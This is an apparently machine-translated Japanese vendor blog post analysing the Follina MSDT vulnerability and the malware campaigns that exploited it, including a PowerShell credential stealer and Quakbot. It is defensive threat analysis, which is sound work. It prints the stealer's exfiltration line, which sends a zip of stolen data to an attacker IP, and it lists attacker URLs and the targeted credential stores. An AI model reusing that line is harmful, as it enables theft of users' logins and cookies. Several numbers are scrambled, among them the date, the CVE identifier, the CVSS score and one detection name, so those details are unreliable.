30年2022月2022日、Microsoft Windows Support Diagnostic Tool (MSDT) に、高深刻度 (CVSS:30190) のゼロデイリモートコード実行脆弱性 CVE-9.3-XNUMX「FOLLINA」が発見されました。
このMSDTツールは、Microsoft Officeドキュメントなどのアプリケーションの問題を診断します。Word文書などの初期攻撃ベクトルは、リモートテンプレート機能を使用してHTMLファイルをダウンロードし、URLプロトコルを使用してこの診断ツール(MSDT)を呼び出し、悪意のあるコードを実行します。当初の攻撃はMicrosoft Wordに限定されていましたが、最近ではRTFやOutlookにも攻撃ベクトルが拡大しています。
この脆弱性は既に悪用されており、攻撃者はこの脆弱性を悪用することで任意のコードを実行し、追加のプログラムをインストールすることができます。攻撃者はこの脆弱性を利用して、バックドア、AsyncRAT、Quakbotなどのマルウェアを北米およびヨーロッパの消費者や業界に拡散させています。
脆弱性の詳細な分析:
MSDT ツールへの最初の呼び出しアプリケーションは Microsoft Office (Word、Excel、RTF など) になります。
図 フロー図
以下は、「Employment_Agreement_Template」という名前の RTF サンプルの例です。これらの RTF ドキュメントでは OLE オブジェクトが使用されています。
図 RTFファイル OLE オブジェクト
このドキュメントを開くと、次のメッセージが表示されます。
被害者が「はい」をクリックすると、以下に示すように、埋め込まれたリンク http[:]//45[.]76[.]53[.]253/1.html からエンコードされた HTML ファイルがダウンロードされます。
HTML ドキュメントには、コードの下にあるファイルの下部にコメント化された「A」文字が含まれています。
図: HTMLファイルにエンコードされたデータ
HTMLファイル内の埋め込みコードは、PowerShell構文を含むパラメータIT_BrowseForFileを指定してms-msdtコマンドを実行し、PCWDiagnosticを呼び出します。Base64エンコードされたデータのデコード部分は以下のとおりです。
図 デコードされたデータ
このコードは、msdt.exe が実行中の場合はそれを停止し、URL「hXXps [:]//seller-notification [.]live/Zgfbe234dg」に接続して、POWERSHELL スクリプトをダウンロードします。
Follinaエクスプロイトは、 PowerShellベースのスティーラーその内容をさらに詳しく見てみましょう。
図 スクリプトコンテンツパート1
このスクリプトは、Appdata/Roaming 内を列挙し、Firefox、Opera、Yandex、Vivaldi、CentBrowser、Comodo、Chedot、Orbitum、Chromium、Slimjet、Xvast、Kinza、Iridium、CocCoc、AVAST Software、Chrome、Outlook、Thunderbird、NetSarang、Windows Live、FileZilla、MobaXterm、WeChat などのアプリケーションのログイン データや Cookie などを盗もうとします。
スティーラーはレジストリを照会して、Autodesk、MobaXterm、Oray SunLogin RemoteClient、MailMaster、Navicat、WinSCP、Microsoft Office、FTP、RAdmin などのアプリケーションに関連する情報を盗みます。
図 スクリプトコンテンツパート2
これ以外にも、マシンに関連する次のような情報も収集します。
- システム情報(ホスト名、OS関連情報、所有者、BIOS情報、登録所有者を含む)
製品 ID、元のインストール日、システムの起動時間、システムの製造元、システム モデル、システム タイプ、プロセッサ、BIOS バージョン、システム ロケール、タイム ゾーン、物理メモリの合計、ドメイン、ログオン サーバーなど) - IP設定(Ipconfig経由)
- ワークステーションの構成
- ユーザーアカウント情報
- ローカルグループ管理者
- 製品名のバージョン
.zip ファイルが %temp% に作成され、URL に送信されます:
$http_url = “hxxp://45[.]77.156[.]179:443/” + $ip + “———-” + $time1 + “.zip”
$time1は、次のように計算されたエポックタイムスタンプです。
これは仮想化チェックとしても機能します。
Quakbot の別の例を見てみましょう。
悪意のあるHTML添付ファイルを含むフィッシングメールは、アーカイブファイル(.img)(ed63c189b52e4eb663598dc0c3121e05)をダウンロードします。このアーカイブには、.lnk(76390978f26d3c6d7f799257542796ce)、qbotペイロード(a14d48974eab6839b1238f984b3c28d2)、およびdocファイル(e7015438268464cedad98b1544d643ad)が含まれています。
図 フロー図
zipファイル内のqbotペイロードは.lnk経由で実行され、.docファイルはHTMLファイルをダウンロードします。この.htmlファイルは、Follinaを悪用して別の.qbotペイロードを再度ダウンロードします。
ここでHTMLファイルはhttp[:]//185[.]234[.]247[.]119からダウンロードされ、次の図に示すデータが含まれています。
図 HTMLファイルのデータ
このHTMLは上記のURLに接続し、Quakbot dll(ce86511634b5420332eb6267c0e2ae2e)をダウンロードし、regsvr32.exeを介して実行されます。
分析:
このQuakbotファイルは、RCDATA内の.rsrcセクションに暗号化されたデータを持つDelphiコンパイル済みファイルです。このデータは仮想的に割り当てられたメモリ内で復号されます。以下の図は、暗号化されたデータと復号ループを示しています。
図 暗号化されたデータ
図 説明ループ
これはAPIに復号化され、1st ステージPEファイル
フローは第1段階に進み、DLLインジェクションを実行し、Quakbotペイロードをメモリに読み込みます。暗号化された文字列に対してRC4復号化が行われ、アンチウイルス関連プロセスなどのプロセスリストが読み込まれます。これらのプロセスが実行中であることが確認された場合、ペイロードは終了します。下の図では、チェックされているプロセスが確認できます。
チェック対象のプロセスのリストには以下が含まれます:
その後、「onedrivesetup.exe」でプロセスインジェクションを実行します。
Qbotは「obama186」キャンペーンに関連しています。以下は「onedrivesetup.exe」からのC2接続を示す画像です。
バイパステクニック:
攻撃者が最初の攻撃ベクトルでエンコード手法を用いて検出を回避するケースが見受けられます。以下の例がその例です。
図 例1
図 例2
まとめ:
これは近年で最も深刻なゼロデイ脆弱性の一つです。このCVEは多くのバイパス手法を用いており、修正プログラムも存在せず、容易に悪用される可能性があります。Microsoftからセキュリティパッチがリリースされたら、ユーザーは直ちに修正する必要があります。それまでは、組織の皆様には警戒を怠らず、以下の対策を講じて攻撃対象領域と被害を軽減することをお勧めします。
「Follina」の修復については、次のアドバイスに従ってください。
Quick Heal はどのようにして顧客を保護しますか?
Quick Heal 製品の既存の高度な保護テクノロジーは、お客様を Follina から保護します。
弊社の行動検知技術では、Follinaに対して「CVE_2022_30190_Follina」という検出名が付けられています。同様に、Seqrite Hawk Hunt製品では、「CVE_XNUMX_XNUMX_Follina」というポリシーが採用されています。 「QHIR_CVE_2022_30190_フォリナ」 この攻撃を識別するために。
Follina のファイルベースおよびネットワークベースの検出は次のとおりです。
1. ファイルベース:
- バックドア.Turian.S28183972
- トロイの木馬.Qbot.S28211728
- CVE-2022-30190.46655
- CVE-2022-30190.46638
- CVE-2022-30190.46635
- CVE-2022-30190.46624
2.ネットワークベース:
- CVE-2022-30190.RCE!46674
- CVE-2022-30190.RCE!46675
主題専門家
テジャスヴィニ・サンダポラ
アムルタ・ワグ
